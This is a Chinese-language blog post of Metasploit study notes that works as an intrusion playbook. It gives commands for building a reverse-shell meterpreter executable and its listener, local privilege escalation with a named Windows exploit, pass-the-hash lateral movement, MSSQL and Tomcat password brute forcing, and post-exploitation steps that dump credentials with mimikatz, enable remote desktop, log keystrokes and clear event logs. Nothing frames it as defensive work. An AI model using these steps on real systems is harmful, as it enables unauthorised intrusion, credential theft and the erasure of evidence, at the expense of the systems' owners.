昔日

metasploit 学习笔记

Jw0N9'Blog:

很早之前学的,最近用到,温习了一下



  1. 生成一个payload:Msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip地址LPORT=监听的端口X>xx.exe





    1. 在msf中监听


    2. Use multi/handler


    3. Set payload windows/meterpreter/reverse_tcp


    4. Set LHOST 你的ip地址


    5. Set LPORT 监听的端口


    6. Exploit



  2. 反弹回来以后,可以尝试getuid,getsystem(比较鸡肋)。




    1. 执行background把meterpreter放入后台。进行本地提权。


    2. Search windows/local 搜索一下本地的提权漏洞。


    3. Use exploit/windows/local/ms13_053_schlamperei(可以自行选择)


    4. Show options 查看那些需要设置的


    5. Set session 号数


    6. Set payload windows/meterpreter/reverse_tcp


    7. Set LHOST 你的ip 地址


    8. Set LPORT 端口号


    9. Exploit



  3. 大概的流程就是这样。


  4. Hash值传递




    • 获得meterpreter后hashdump 


    • Use windows/smb/psexec


    • Set payload windows/meterpreter/reverse_tcp


    • Set LHOST 你的ip地址


    • Set LPORT 监听的端口


    • Set RHOST 内网的主机


    • Set SMBPass hash值


    • Exploit



  5. 在内网渗透中比较有用吧。


  6. Mssql模块




    • Use windows/mssql/mssql_payload


    • Set payload windows/meterpreter/reverse_tcp


    • Set LHOST 你的ip地址


    • Set LPORT 监听的端口号


    • Set RHOST 目标的ip地址


    • Set PASSWORD 密码


    • Exploit       


    •  在此之前可以使用  use scanner/mssql/mssql_login来扫描常用的弱口令。。。






可以结合最近发出来的meterpreter 生成器 生成payload就没有那么麻烦了




爆破tomcat:
msf > search tomcat
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts xxx
msf auxiliary(tomcat_mgr_login) > set rport 8080
msf auxiliary(tomcat_mgr_login) > exploit





相关链接:http://sb.f4ck.org/thread-21034-1-1.html


                 https://github.com/codeliker/mymig_meterpreter


 


2015.5.17更新


meterpreter常见命令:


load mimikatz  获取密码--kerberos  在获取明文密码


run getgui -e   开启3389
background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。


keyscan_start 键盘输入探测


keyscan_dump 显示捕获的密码


clearev   清除事件日志







评论

热度(1)

  1. 昔日Jw0N9'Blog 转载了此文字